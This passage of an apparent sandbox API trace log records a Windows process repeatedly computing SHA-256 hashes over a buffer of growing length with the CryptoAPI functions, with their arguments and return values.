	[0197.027] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.027] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0197.027] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.027] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c610
	[0197.027] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230c610, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c610, pdwDataLen=0x128aac) returned 1
	[0197.027] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.027] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.027] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.027] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.027] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0197.027] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.027] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c638
	[0197.027] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230c638, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c638, pdwDataLen=0x128aac) returned 1
	[0197.027] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.027] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.027] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.028] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.028] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0197.028] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.028] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c660
	[0197.028] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230c660, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c660, pdwDataLen=0x128aac) returned 1
	[0197.028] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.028] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.028] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.028] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.028] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0197.028] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.028] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c688
	[0197.028] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230c688, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c688, pdwDataLen=0x128aac) returned 1
	[0197.028] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.028] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.028] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.029] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.029] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0197.029] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.029] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c6b0
	[0197.029] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230c6b0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c6b0, pdwDataLen=0x128aac) returned 1
	[0197.029] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.029] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.029] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.030] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.030] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0197.030] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.030] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c6d8
	[0197.030] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230c6d8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c6d8, pdwDataLen=0x128aac) returned 1
	[0197.030] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.030] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.030] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.030] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.030] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0197.030] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.030] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c700
	[0197.030] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230c700, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c700, pdwDataLen=0x128aac) returned 1
	[0197.030] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.030] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.030] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.031] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.031] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0197.031] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.031] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c728
	[0197.031] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230c728, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c728, pdwDataLen=0x128aac) returned 1
	[0197.031] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.031] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.031] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.031] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.031] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0197.031] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.031] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c750
	[0197.031] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230c750, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c750, pdwDataLen=0x128aac) returned 1
	[0197.031] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.031] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.031] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.032] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.032] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0197.032] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.032] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c778
	[0197.032] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230c778, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c778, pdwDataLen=0x128aac) returned 1
	[0197.032] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.032] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.032] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.032] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.032] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0197.032] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.032] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c7a0
	[0197.032] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230c7a0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c7a0, pdwDataLen=0x128aac) returned 1
	[0197.032] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.032] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.032] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.033] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.033] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0197.033] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.033] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c7c8
	[0197.033] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230c7c8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c7c8, pdwDataLen=0x128aac) returned 1
	[0197.033] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.033] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.033] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.034] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.034] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0197.034] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.034] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c7f0
	[0197.034] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230c7f0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c7f0, pdwDataLen=0x128aac) returned 1
	[0197.034] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.034] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.034] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.034] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.034] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0197.034] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.034] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c818
	[0197.034] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230c818, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c818, pdwDataLen=0x128aac) returned 1
	[0197.034] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.034] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.035] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.035] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.035] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0197.035] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.035] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c840
	[0197.035] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230c840, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c840, pdwDataLen=0x128aac) returned 1
	[0197.035] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.035] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.035] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.035] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.035] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0197.035] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.035] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c868
	[0197.035] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230c868, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c868, pdwDataLen=0x128aac) returned 1
	[0197.035] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.035] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.035] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.036] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.036] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0197.036] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.036] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c890
	[0197.036] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230c890, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c890, pdwDataLen=0x128aac) returned 1
	[0197.036] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.036] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.036] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.036] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.036] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0197.036] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.036] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c8b8
	[0197.036] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230c8b8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c8b8, pdwDataLen=0x128aac) returned 1
	[0197.036] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.036] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.036] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.037] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.037] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0197.037] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.037] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c8e0
	[0197.037] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230c8e0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c8e0, pdwDataLen=0x128aac) returned 1
	[0197.037] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.037] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.037] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.037] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.037] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0197.037] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.037] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c908
	[0197.037] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230c908, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c908, pdwDataLen=0x128aac) returned 1
	[0197.037] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.037] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.037] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.038] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.038] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0197.038] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.038] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c930
	[0197.038] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230c930, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c930, pdwDataLen=0x128aac) returned 1
	[0197.038] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.038] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.038] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.038] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.038] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0197.038] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.038] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c958
	[0197.038] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230c958, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c958, pdwDataLen=0x128aac) returned 1
	[0197.038] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.038] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.038] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.039] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.039] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0197.039] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.039] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c980
	[0197.039] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230c980, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c980, pdwDataLen=0x128aac) returned 1
	[0197.039] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.039] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.039] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.039] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.039] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0197.039] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.039] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c9a8
	[0197.039] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230c9a8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c9a8, pdwDataLen=0x128aac) returned 1
	[0197.039] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.039] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.039] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.040] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.040] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0197.040] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.040] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c9d0
	[0197.040] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230c9d0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c9d0, pdwDataLen=0x128aac) returned 1
	[0197.040] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.040] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.040] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.040] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.040] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x540, dwFlags=0x0) returned 1
